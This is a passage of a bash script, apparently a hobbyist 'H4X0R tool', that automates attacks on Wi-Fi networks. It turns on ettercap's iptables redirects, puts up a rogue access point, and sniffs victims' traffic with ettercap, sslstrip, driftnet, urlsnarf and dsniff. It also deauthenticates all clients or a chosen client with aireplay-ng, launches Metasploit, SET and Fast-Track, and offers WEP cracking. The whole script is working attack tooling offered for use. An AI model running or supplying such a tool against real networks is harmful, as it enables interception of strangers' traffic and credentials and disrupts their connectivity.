&>/dev/null & } #Cleans up processes made by this script function cleanup(){ clear; echo 0 > /proc/sys/net/ipv4/ip_forward; killall -q arpspoof dhcpd3 airbase-ng aireplay-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null & iptables --flush; iptables --table nat --flush; iptables --delete-chain; iptables --table nat --delete-chain; airmon-ng stop "$MIFACE"; airmon-ng stop "$WIFACE"; ifconfig "$WIFACE" down; ifconfig "$WIFACE" up; echo > /etc/dhcp3/dhcpd.conf; echo > /var/lib/dhcp3/dhcpd.leases; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html } #Sets up the sniffing methods and calls the Rogue AP function automatically function sniffap(){ clear; echo "******************************************************************"; echo "Checking to see if your ready to run ettercap..."; echo "******************************************************************"; if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf; echo "Uncommented your iptables in /etc/etter.conf for you :)"; fi iptables -t nat -A PREROUTING -p udp -j DNAT --to "$GW"; mirror; read -p "Press ENTER to start ettercap after you have someone connected to "$AP"" xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 /"$GW"/ // &>/dev/null & #sudo ettercap -G &>/dev/null & sleep 7; echo "******************************************************************"; echo "If ettercap is now sniffing then startup some other fun tools"; echo "******************************************************************"; showMenu () { echo echo "1) sslstrip" echo "2) driftnet" echo "3) urlsnarf" echo "4) dsniff" echo "5) Add your own tool" echo "6) Deauth victim" echo "7) Stop sniffing and start attacking" echo "8) Exit and cleanup" echo "9) Exit and leave everything running" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Setting up sslstrip"; xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null & sleep 1; xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null & ;; "2") echo "Setting up driftnet"; xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i at0 &>/dev/null & ;; "3") echo "Setting up urlsnarf"; xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i at0 &>/dev/null & ;; "4") echo "Setting up dsniff"; xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i at0 -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null & ;; "5") echo "******************************************************************"; echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org"; xterm -bg black -fg blue &>/dev/null & echo "******************************************************************"; ;; "6") deauth; ;; "7") attackap; ;; "8") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; cleanup; exit 0 ;; "9") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html exit 0 ;; esac done } #Sets up the deauth method for your Rogue Ap function deauth(){ echo "******************************************************************"; xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng "$MIFACE" &>/dev/null & echo "You should see a new window, let it run for 10 seconds....."; sleep 10; echo "You should now see some activity"; echo "******************************************************************"; echo "Enter the MAC of the network you wish to deauth"; read APMAC; echo "Using "$APMAC" as the network to deauth"; echo "******************************************************************"; echo "Enter the channel of the network you wish to deauth"; read CHAN; echo "Using channel "$CHAN"" echo "******************************************************************"; echo "Do you want to deauth all clients or just 1 client? (all or one)"; read OA; echo "******************************************************************"; echo "Enter the number of deauth packets to send, (5-10 normally) Note: 0 means to send them continuously"; read DP; echo "******************************************************************"; if [ "$OA" == "all" ];then echo "Deauthing all clients on "$APMAC" with "$DP" Packets"; xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" "$MIFACE" &>/dev/null & elif [ "$OA" == "one" ];then killall -q airodump-ng; xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng -c "$CHAN" --bssid "$APMAC" -w airodump$(date +%F-%H%M).log "$MIFACE" &>/dev/null & echo "Enter the Client's MAC address connected to "$APMAC""; echo "******************************************************************"; read CMAC; echo "******************************************************************"; echo "Deauthing "$CMAC" on "$APMAC" with "$DP" Packets"; echo "******************************************************************"; xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" -c "$CMAC" "$MIFACE" &>/dev/null & else echo "******************************************************************"; echo "Enter 'all or 'one' only!!!"; exit 0 fi } #Sets up the attack methods for your Rogue AP function attackap(){ clear; echo "******************************************************************"; echo "You have choosen to attack, Select some tools to start attacking, then launch your Rogue AP"; echo "******************************************************************"; showMenu () { echo echo "1) SimpleHTTPServer port 80" echo "2) Social Engineering Toolkit" echo "3) Metasploit" echo "4) Fast-Track" echo "5) Add your own tool" echo "6) Launch your Rogue AP" echo "7) Deauth victim" echo "8) Exit and cleanup" echo "9) Exit and leave everything running" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") echo "Setting up SimpleHTTPServer on port 80 in "$PWD""; xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null & sleep 3; ;; "2") echo "Setting up Social Engineering Toolkit"; cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null & sleep 10; ;; "3") echo "Setting up Metasploit........."; cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null & sleep 2; echo "Few more seconds......"; sleep 15; ;; "4") echo "Setting up Fast-Track"; cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null & sleep 10; ;; "5") echo "******************************************************************"; echo "What other attacks are you planning? Email me slippery@shellium.org"; xterm -bg black -fg blue &>/dev/null & echo "******************************************************************"; ;; "6") mirror; ;; "7") deauth; ;; "8") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; cleanup; exit 0 ;; "9") echo "******************************************************************"; echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********"; echo "******************************************************************"; firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html exit 0 ;; esac done } # Defines if you want to sniff or attack the Rogue AP function qrogueap(){ clear; echo "Do you want to sniff or attack "$AP"? (sniff or attack)"; read DO; if [ "$DO" == "sniff" ];then sniffap; elif [ "$DO" == "attack" ];then attackap; else echo "******************************************************************"; echo "Enter 'sniff' or 'attack' only!!!"; exit 0 fi } #Start Menu showMenu () { test "$(whoami)" != 'root' && (echo YOU MUST RUN THIS AS ROOT; exit 0) echo echo "*******Please select a choice below*******" echo "1) H4X0R a network your already connected to" echo "2) Create a Rogue Ap and H4X0R it" echo "3) Crack WEP" echo "4) Need Help?" echo "5) Update Tools" echo } while [ 1 ] do showMenu read CHOICE case "$CHOICE" in "1") subnetscript; ;; "2") rogueapscript; ;; "3") #Have only 1 tool uncommented below (use the apt-get line only to install wifite witch is my favorite tool btw...)# # apt-get update && apt-get install wifite # wepcrack; #grimwepa & #sh -c "python wifite.py; sudo -s" & ;; "4") firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html ;; "5") echo "Updating tools......" cd /pentest/wireless/aircrack-ng/; svn up; cd /pentest/exploits/framework3/; svn up; cd /pentest/exploits/SET/; ./set-update; cd /pentest/exploits/fasttrack/; svn up; cd /pentest/wireless/wifite/; python wifite.py -upgrade; ;; esac done